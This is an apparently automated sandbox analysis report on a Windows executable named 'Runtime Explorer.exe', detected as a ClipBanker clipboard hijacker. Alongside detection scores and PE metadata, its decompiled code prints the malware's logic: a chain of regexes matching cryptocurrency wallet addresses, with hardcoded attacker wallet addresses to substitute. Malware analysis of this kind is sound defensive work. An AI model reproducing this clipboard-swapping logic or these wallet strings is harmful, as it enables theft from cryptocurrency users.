              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: Runtime Explorer.exe | Binary or memory string: A*\AE:\Desarrollo\FER\vb6\4.0 ALLINONE\Proyecto1.vbp
              Source: Runtime Explorer.exe, 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: @*\AE:\Desarrollo\FER\vb6\4.0 ALLINONE\Proyecto1.vbp
              Source: C:\Users\user\Desktop\Runtime Explorer.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Users\user\Desktop\Runtime Explorer.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Runtime Explorer.exe; User Timer Set: Timeout: 100ms
              Source: all processes; Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

              Stealing of Sensitive Information

              Source: Yara match; File source: Runtime Explorer.exe, type: SAMPLE
              Source: Yara match; File source: 0.2.Runtime Explorer.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 0.0.Runtime Explorer.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match; File source: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match; File source: 00000000.00000000.430713298.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match; File source: Process Memory Space: Runtime Explorer.exe PID: 6616, type: MEMORYSTR
              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | 1 Windows Management Instrumentation | Path Interception | Path Interception | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Query Registry | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Software Packing | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | 2 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              [Behavior graph, ID 599518. Sample: Runtime Explorer.exe; Start date: 29/03/2022; Architecture: WINDOWS; Score: 68. Sample-level signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Clipboard Hijacker. Process started: Runtime Explorer.exe, with signature: Uses Windows timers to delay execution.]

              Source | Detection | Scanner | Label
              Runtime Explorer.exe | 74% | Virustotal |
              Runtime Explorer.exe | 40% | Metadefender |
              Runtime Explorer.exe | 69% | ReversingLabs | Win32.Trojan.ClipBanker
              Runtime Explorer.exe | 100% | Avira | TR/ClipBanker.avslj
              No Antivirus matches
              Source | Detection | Scanner | Label
              0.0.Runtime Explorer.exe.400000.0.unpack | 100% | Avira | TR/ClipBanker.avslj
              No Antivirus matches
              No contacted domains info
              No contacted IP infos
              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:599518
              Start date and time:2022-03-29 19:09:39 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 12s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:Runtime Explorer.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal68.spyw.evad.winEXE@1/0@0/0
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 99.9% (good quality ratio 94.7%)
              • Quality average: 43.7%
              • Quality standard deviation: 23.9%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 5
              • Number of non-executed functions: 6
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              No simulations
              No context
              No created / dropped files found
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):4.323322308973506
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.15%
              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Runtime Explorer.exe
              File size:155648
              MD5:d42c2456ea9de66a75a29dea464a4e4d
              SHA1:1e8ce36d82aab5d9ae09630bf01a77d92778d603
              SHA256:907e7f7e2ee47c955cf315747ab913b591e9046f51c0f3ba9a6eef696346198e
              SHA512:6132dd5508edf64f2226b729670504d44754443e42139a9a1195764d5a681a24a492e716af309fabb50c041170288d2ce9d79d9dcedddc738ceb483557c0537e
              SSDEEP:768:fIHIzUzS7eXCHPVAfktEtzIpo9TRyG0onSwj6lGT4YEybLlY4aKHR++uVTShUhM7:Q9DCS48h0mvMkDmXPYavc7t
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A...A...A.......@...(...B.......@...RichA...........................PE..L....n.a............................<.............@
              Icon Hash:00928e8e868eb000
              Entrypoint:0x40143c
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x61BB6EB4 [Thu Dec 16 16:52:04 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:0a464e2f61945ed36131666607401478
              Instruction
              push 0040C780h
              call 00007F2AC4B010F5h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              xor byte ptr [eax], al
              add byte ptr [eax], al
              inc eax
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [edx+06h], dl
              and ebp, dword ptr [ebp+4F221CBCh]
              stosb
              pop ecx
              lahf
              jmp far 0000h : F13D4C77h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add dword ptr [eax], eax
              add byte ptr [eax], al
              inc eax
              add byte ptr [ebp+eax+7250086Dh], al
              outsd
              push 00000065h
              arpl word ptr [ecx+esi+00h], si
              add dword ptr [ebp+08h], ebp
              sbb eax, 00000000h
              add byte ptr [eax], al
              add bh, bh
              int3
              xor dword ptr [eax], eax
              add dword ptr [esi], esp
              jbe 00007F2AC4B010D3h
              adc byte ptr [ebp-7ABF11D3h], al
              pop ds
              push es
              cli
              or dword ptr [C9652794h], esi
              dec eax
              shr dword ptr [esi-76BC0799h], FFFFFFA2h
              invd
              das
              call 00007F2B13EA3AD3h
              lodsd
              xor ebx, dword ptr [ecx-48EE309Ah]
              or al, 00h
              stosb
              add byte ptr [eax-2Dh], ah
              xchg eax, ebx
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              jp 00007F2AC4B010B3h
              add byte ptr [eax], al
              push esp
              mov cl, 00h
              add byte ptr [eax], al
              add eax, 726F4600h
              insd
              xor dword ptr [eax], eax
              or eax, 52001001h
              jne 00007F2AC4B01170h
              je 00007F2AC4B0116Bh
              insd
              and byte ptr [ebp+78h], al
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17b14 | 0x28 | .text
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a000 | 0xb574 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x238 | 0x20 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x14c | .text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x17150 | 0x18000 | False | 0.243204752604 | data | 4.79919923332 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .data | 0x19000 | 0xb24 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .rsrc | 0x1a000 | 0xb574 | 0xc000 | False | 0.0899251302083 | data | 3.59630796938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              Name | RVA | Size | Type | Language | Country
              RT_ICON | 0x24c98 | 0x8dc | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
              RT_ICON | 0x20a70 | 0x4228 | dBase III DBT, version number 0, next free block index 40 | |
              RT_ICON | 0x1e4c8 | 0x25a8 | dBase III DBT, version number 0, next free block index 40 | |
              RT_ICON | 0x1ca60 | 0x1a68 | dBase III DBT, version number 0, next free block index 40 | |
              RT_ICON | 0x1b9b8 | 0x10a8 | dBase III DBT, version number 0, next free block index 40 | |
              RT_ICON | 0x1b030 | 0x988 | data | |
              RT_ICON | 0x1a978 | 0x6b8 | data | |
              RT_ICON | 0x1a510 | 0x468 | GLS_BINARY_LSB_FIRST | |
              RT_GROUP_ICON | 0x1a498 | 0x78 | data | |
              RT_VERSION | 0x1a240 | 0x258 | data | English | United States
              DLL | Import
              MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaStrI4, __vbaVarMove, __vbaVarVargNofree, __vbaFreeVar, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaNextEachVar, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaForEachCollAd, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaVarCmpGe, __vbaExitProc, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaBoolVar, __vbaVargVar, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaExitEachColl, __vbaStrCmp, __vbaVarTstEq, __vbaObjVar, DllFunctionCall, __vbaVarLateMemSt, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarSetVar, __vbaVarAdd, __vbaLateMemCall, __vbaStrToAnsi, __vbaVarDup, __vbaVarLateMemCallLd, __vbaVarCopy, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaForEachVar, _allmul, _CItan, __vbaNextEachCollAd, __vbaAryUnlock, _CIexp, __vbaFreeStr, __vbaFreeObj
              Description | Data
              Translation | 0x0409 0x04b0
              InternalName | Runtime Explorer
              FileVersion | 1.00
              CompanyName | Microsoft Windows
              ProductName | Runtime Explorer
              ProductVersion | 1.00
              OriginalFilename | Runtime Explorer.exe
              Language of compilation system | Country where language is spoken
              English | United States
              No network behavior found
              Target ID:0
              Start time:21:10:52
              Start date:29/03/2022
              Path:C:\Users\user\Desktop\Runtime Explorer.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\Runtime Explorer.exe"
              Imagebase:0x400000
              File size:155648 bytes
              MD5 hash:D42C2456EA9DE66A75A29DEA464A4E4D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Visual Basic
              Yara matches:
              • Rule: JoeSecurity_Clipboard_Hijacker_3, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Clipboard_Hijacker_3, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000000.430713298.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
              Reputation:low

              Execution Graph

              Execution Coverage:10.7%
              Dynamic/Decrypted Code Coverage:0.2%
              Signature Coverage:0%
              Total number of Nodes:414
              Total number of Limit Nodes:27

              Executed Functions

              C-Code - Quality: 68%
              			E00416F91(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
              				intOrPtr _v12;
              				intOrPtr _v16;
              				signed int _v40;
              				signed int _v44;
              				void* _v48;
              				signed int _v52;
              				char _v68;
              				char* _v76;
              				signed int _v84;
              				intOrPtr* _v92;
              				char _v100;
              				void* _v104;
              				intOrPtr _v172;
              				void* _t400;
              				short _t403;
              				short _t406;
              				short _t409;
              				short _t412;
              				short _t415;
              				short _t418;
              				short _t421;
              				short _t424;
              				short _t427;
              				short _t430;
              				short _t433;
              				short _t436;
              				short _t439;
              				short _t442;
              				short _t445;
              				short _t448;
              				short _t451;
              				short _t454;
              				short _t457;
              				intOrPtr* _t458;
              				void* _t459;
              				intOrPtr* _t460;
              				void* _t464;
              				void* _t468;
              				void* _t472;
              				void* _t476;
              				void* _t480;
              				void* _t484;
              				void* _t488;
              				void* _t492;
              				void* _t496;
              				void* _t502;
              				void* _t506;
              				void* _t516;
              				intOrPtr* _t611;
              				char* _t613;
              				intOrPtr* _t615;
              				intOrPtr* _t616;
              				intOrPtr* _t617;
              				intOrPtr* _t618;
              				intOrPtr* _t619;
              				intOrPtr* _t620;
              				intOrPtr* _t621;
              				intOrPtr* _t622;
              				intOrPtr* _t623;
              				intOrPtr* _t624;
              				intOrPtr* _t625;
              				intOrPtr* _t626;
              				intOrPtr _t629;
              				void* _t633;
              				intOrPtr _t634;
              
              				_t634 = _t633 - 0xc;
              				_push(0x401256);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t634;
              				_push(__ebx);
              				_push(__esi);
              				_push(__edi);
              				_v16 = _t634 - 0x94;
              				_v12 = 0x401238;
              				_v40 = 0;
              				_v44 = 0;
              				_v48 = 0;
              				_v52 = 0;
              				_v68 = 0;
              				_v84 = 0;
              				_v100 = 0;
              				 *0x419024 = 0;
              				_v172 =  *_a4;
              				L00401328();
              				if(_v48 == 0) {
              					_push( &_v48);
              					_push(0x412750); // executed
              					L0040131C(); // executed
              				}
              				_t611 = _v48;
              				_t400 =  *((intOrPtr*)( *_t611 + 0x30))(_t611, 0xffffffff);
              				asm("fclex");
              				if(_t400 < 0) {
              					_push(0x30);
              					_push(0x412740);
              					_push(_t611);
              					_push(_t400);
              					L00401322();
              				}
              				_t629 = 8;
              				_v76 = 0x411cd8;
              				_v84 = _t629;
              				L00401394();
              				_v92 = 0x419028;
              				_v100 = 0x4008;
              				_v76 = L"\\b([13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-zAC-HJ-NP-Z02-9]{11,71})\\b";
              				_v84 = _t629;
              				L00401376();
              				_t403 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              				_v104 = _t403;
              				L00401352();
              				_v92 = 0x419028;
              				_v100 = 0x4008;
              				if(_v104 == 0) {
              					_v76 = L"\\b0x[a-fA-F0-9]{40}\\b";
              					_v84 = _t629;
              					L00401376();
              					_t406 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              					_v104 = _t406;
              					L00401352();
              					_v92 = 0x419028;
              					_v100 = 0x4008;
              					if(_v104 == 0) {
              						_v76 = L"\\b4([0-9]|[A-J])(.){93,106}\\b";
              						_v84 = _t629;
              						L00401376();
              						_t409 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              						_v104 = _t409;
              						L00401352();
              						if(_v104 == 0) {
              							_v92 = 0x419028;
              							_v100 = 0x4008;
              							_v76 = L"\\b((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}\\b";
              							_v84 = _t629;
              							L00401376();
              							_t412 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              							_v104 = _t412;
              							L00401352();
              							_v92 = 0x419028;
              							_v100 = 0x4008;
              							if(_v104 == 0) {
              								_v76 = L"\\b(ltc1|[LM])[a-zA-HJ-NP-Z0-9]{26,40}\\b";
              								_v84 = _t629;
              								L00401376();
              								_t415 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              								_v104 = _t415;
              								L00401352();
              								_v92 = 0x419028;
              								_v100 = 0x4008;
              								if(_v104 == 0) {
              									_v76 = L"\\bD{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}\\b";
              									_v84 = _t629;
              									L00401376();
              									_t418 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              									_v104 = _t418;
              									L00401352();
              									_v92 = 0x419028;
              									_v100 = 0x4008;
              									if(_v104 == 0) {
              										_v76 = L"\\bX[1-9A-HJ-NP-Za-km-z]{33}\\b";
              										_v84 = _t629;
              										L00401376();
              										_t421 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              										_v104 = _t421;
              										L00401352();
              										if(_v104 == 0) {
              											_v92 = 0x419028;
              											_v100 = 0x4008;
              											_v76 = L"\\bA[0-9a-zA-Z]{33}\\b";
              											_v84 = _t629;
              											L00401376();
              											_t424 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              											_v104 = _t424;
              											L00401352();
              											if(_v104 == 0) {
              												_v92 = 0x419028;
              												_v100 = 0x4008;
              												_v76 = L"\\b(DdzFF.*)|(addr1.*)|(Ae2.*)\\b";
              												_v84 = _t629;
              												L00401376();
              												_t427 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              												_v104 = _t427;
              												L00401352();
              												_v92 = 0x419028;
              												_v100 = 0x4008;
              												if(_v104 == 0) {
              													_v76 = L"\\b(4|8)?[0-9A-Z]{1}[0-9a-zA-Z]{93}([0-9a-zA-Z]{11})?\\b";
              													_v84 = _t629;
              													L00401376();
              													_t430 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              													_v104 = _t430;
              													L00401352();
              													if(_v104 == 0) {
              														_v92 = 0x419028;
              														_v100 = 0x4008;
              														_v76 = L"\\bT[0-9a-zA-Z]{33}\\b";
              														_v84 = _t629;
              														L00401376();
              														_t433 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              														_v104 = _t433;
              														L00401352();
              														if(_v104 == 0) {
              															_v92 = 0x419028;
              															_v100 = 0x4008;
              															_v76 = L"\\bbnb[0-9a-zA-Z]{39}\\b";
              															_v84 = _t629;
              															L00401376();
              															_t436 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              															_v104 = _t436;
              															L00401352();
              															if(_v104 == 0) {
              																_v92 = 0x419028;
              																_v100 = 0x4008;
              																_v76 = L"\\br[0-9a-zA-Z]{33}\\b";
              																_v84 = _t629;
              																L00401376();
              																_t439 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              																_v104 = _t439;
              																L00401352();
              																if(_v104 == 0) {
              																	_v92 = 0x419028;
              																	_v100 = 0x4008;
              																	_v76 = L"\\b1[0-9a-zA-Z]{46,47}\\b";
              																	_v84 = _t629;
              																	L00401376();
              																	_t442 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              																	_v104 = _t442;
              																	L00401352();
              																	if(_v104 == 0) {
              																		_v92 = 0x419028;
              																		_v100 = 0x4008;
              																		_v76 = L"\\bG[0-9a-zA-Z]{55}\\b";
              																		_v84 = _t629;
              																		L00401376();
              																		_t445 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              																		_v104 = _t445;
              																		L00401352();
              																		if(_v104 == 0) {
              																			_v92 = 0x419028;
              																			_v100 = 0x4008;
              																			_v76 = L"\\b[0-9a-zA-Z]{44}\\b";
              																			_v84 = _t629;
              																			L00401376();
              																			_t448 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              																			_v104 = _t448;
              																			L00401352();
              																			if(_v104 == 0) {
              																				_v92 = 0x419028;
              																				_v100 = 0x4008;
              																				_v76 = L"\\bV[0-9a-zA-Z]{33,42}\\b";
              																				_v84 = _t629;
              																				L00401376();
              																				_t451 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              																				_v104 = _t451;
              																				L00401352();
              																				if(_v104 == 0) {
              																					_v92 = 0x419028;
              																					_v100 = 0x4008;
              																					_v76 = L"\\bdgb[0-9a-zA-Z]{40}\\b";
              																					_v84 = _t629;
              																					L00401376();
              																					_t454 = E004134FB(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100); // executed
              																					_v104 = _t454;
              																					L00401352();
              																					if(_v104 == 0) {
              																						_v100 = 0x4008;
              																						_t613 = L"^(?!addr.*).{58}$";
              																						_v92 = 0x419028;
              																						_v76 = _t613;
              																						_v84 = _t629;
              																						L00401376();
              																						_t457 = E004134FB(0x419028,  &_v68, _t613, _t629,  &_v68,  &_v100); // executed
              																						_v104 = _t457;
              																						L00401352();
              																						if(_v104 != 0) {
              																							_t458 = _v48;
              																							if(_t458 == 0) {
              																								_push( &_v48);
              																								_push(0x412750);
              																								L0040131C();
              																								_t458 = _v48;
              																							}
              																							_v104 = _t458;
              																							_t459 =  *((intOrPtr*)( *_t458 + 0x20))(_t458, _t613);
              																							asm("fclex");
              																							if(_t459 < 0) {
              																								_push(0x20);
              																								_push(0x412740);
              																								_push(_v104);
              																								_push(_t459);
              																								L00401322();
              																							}
              																							_t460 = _v48;
              																							if(_t460 == 0) {
              																								_push( &_v48);
              																								_push(0x412750);
              																								L0040131C();
              																								_t460 = _v48;
              																							}
              																							_v104 = _t460;
              																							_v76 = L"XIXWLMD7DIAHQQ6TQOFMVS5JTBS6IXVFY4KHENNWQUWM7TL7GE27IW67JM";
              																							goto L121;
              																						}
              																					} else {
              																						if(_v48 == 0) {
              																							_push( &_v48);
              																							_push(0x412750);
              																							L0040131C();
              																						}
              																						_t615 = _v48;
              																						_t464 =  *((intOrPtr*)( *_t615 + 0x20))(_t615, L"\\bdgb[0-9a-zA-Z]{40}\\b");
              																						asm("fclex");
              																						if(_t464 < 0) {
              																							_push(0x20);
              																							_push(0x412740);
              																							_push(_t615);
              																							_push(_t464);
              																							L00401322();
              																						}
              																						_t460 = _v48;
              																						if(_t460 == 0) {
              																							_push( &_v48);
              																							_push(0x412750);
              																							L0040131C();
              																							_t460 = _v48;
              																						}
              																						_v104 = _t460;
              																						_v76 = L"dgb1qq4mmfkgjxkg40y9p568nm396syq5x7cxpljjs7";
              																						goto L121;
              																					}
              																				} else {
              																					if(_v48 == 0) {
              																						_push( &_v48);
              																						_push(0x412750);
              																						L0040131C();
              																					}
              																					_t616 = _v48;
              																					_t468 =  *((intOrPtr*)( *_t616 + 0x20))(_t616, L"\\bV[0-9a-zA-Z]{33,42}\\b");
              																					asm("fclex");
              																					if(_t468 < 0) {
              																						_push(0x20);
              																						_push(0x412740);
              																						_push(_t616);
              																						_push(_t468);
              																						L00401322();
              																					}
              																					_t460 = _v48;
              																					if(_t460 == 0) {
              																						_push( &_v48);
              																						_push(0x412750);
              																						L0040131C();
              																						_t460 = _v48;
              																					}
              																					_v104 = _t460;
              																					_v76 = L"VaxnygQcu3SgKp7hEZ79mF5wDGm22yp2zo";
              																					goto L121;
              																				}
              																			} else {
              																				if(_v48 == 0) {
              																					_push( &_v48);
              																					_push(0x412750);
              																					L0040131C();
              																				}
              																				_t617 = _v48;
              																				_t472 =  *((intOrPtr*)( *_t617 + 0x20))(_t617, L"\\b[0-9a-zA-Z]{44}\\b");
              																				asm("fclex");
              																				if(_t472 < 0) {
              																					_push(0x20);
              																					_push(0x412740);
              																					_push(_t617);
              																					_push(_t472);
              																					L00401322();
              																				}
              																				_t460 = _v48;
              																				if(_t460 == 0) {
              																					_push( &_v48);
              																					_push(0x412750);
              																					L0040131C();
              																					_t460 = _v48;
              																				}
              																				_v104 = _t460;
              																				_v76 = L"AcLSFNivGXo5DnoPqAdVxHB7qQrUvxjgXxmrGhEFH6v4";
              																				goto L121;
              																			}
              																		} else {
              																			if(_v48 == 0) {
              																				_push( &_v48);
              																				_push(0x412750);
              																				L0040131C();
              																			}
              																			_t618 = _v48;
              																			_t476 =  *((intOrPtr*)( *_t618 + 0x20))(_t618, L"\\bG[0-9a-zA-Z]{55}\\b");
              																			asm("fclex");
              																			if(_t476 < 0) {
              																				_push(0x20);
              																				_push(0x412740);
              																				_push(_t618);
              																				_push(_t476);
              																				L00401322();
              																			}
              																			_t460 = _v48;
              																			if(_t460 == 0) {
              																				_push( &_v48);
              																				_push(0x412750);
              																				L0040131C();
              																				_t460 = _v48;
              																			}
              																			_v104 = _t460;
